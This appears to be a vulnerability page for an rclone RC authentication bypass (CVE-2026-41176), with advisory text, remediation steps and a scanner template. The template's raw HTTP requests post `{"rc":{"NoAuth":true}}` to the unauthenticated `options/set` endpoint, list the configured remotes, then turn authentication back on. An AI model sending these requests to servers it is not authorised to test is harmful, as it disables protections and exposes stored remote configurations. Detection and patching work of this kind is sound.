
Rclone RC - Broken Access Control

CVE-2026-41176
Verified

Description

Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability (CWE-306): the RC endpoint `options/set` can be called without authentication, and it mutates global runtime configuration, including the RC server's own `NoAuth` option. An unauthenticated attacker can therefore post `{"rc":{"NoAuth":true}}`, switch authentication off for every RC call, and then reach administrative functions such as `config/listremotes`. Exploitation requires an RC server that was started without global HTTP authentication; an unauthenticated request to a normal RC call on such a server is refused with HTTP 403, which is what the template's first request checks for.

Severity

Critical

CVSS Score

9.2

Exploit Probability

17%

Affected Product

rclone

Published Date

April 23, 2026

Template Author

theamanrawat

CVE-2026-41176.yaml
id: CVE-2026-41176

info:
  name: Rclone RC - Broken Access Control
  author: theamanrawat
  severity: critical
  description: |
    Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability: the RC endpoint `options/set` can be called without authentication and mutates global runtime configuration, including the RC server's own `NoAuth` option. An unauthenticated attacker can switch authentication off and then reach sensitive administrative functions. Exploitation requires an RC server started without global HTTP authentication.
  impact: |
    Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
  remediation: |
    Upgrade to version 1.73.5 or later.
  reference:
    - https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
    - https://nvd.nist.gov/vuln/detail/CVE-2026-41176
  classification:
    cvss-score: 9.2
    cve-id: CVE-2026-41176
    epss-score: 0.16737
    epss-percentile: 0.95024
    cwe-id: CWE-306
  metadata:
    verified: true
    max-request: 4
    vendor: rclone
    product: rclone
  tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 403'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":true}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "{}")'
          - 'contains(content_type, "application/json")'
        condition: and
        internal: true

  - raw:
      - |
        POST /config/listremotes HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {}

      - |
        POST /options/set HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"rc":{"NoAuth":false}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "remotes")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4a0a0047304502204d1bb79744c55b94102c33a6f4c49dcfe03d8f4fedd7a5b62acbc40f1c03597802210089f333fd97552c051627679e6dbc0165a3ac27ef239a8988e87ca967767b724e:922c64590222798bb761d5b6d8e72950
CVSS Metrics

Score: 9.2
CVE ID: CVE-2026-41176
CWE ID: CWE-306

References

https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
https://nvd.nist.gov/vuln/detail/CVE-2026-41176

Remediation Steps

Upgrade to version 1.73.5 or later. Until the upgrade is deployed, do not run an RC server without global HTTP authentication, since that is the precondition for this exploit: configure `--rc-user` and `--rc-pass`, keep `--rc-addr` bound to a loopback or otherwise restricted address, and treat any unexpected `options/set` request in the RC server's logs as a sign the flaw has been probed.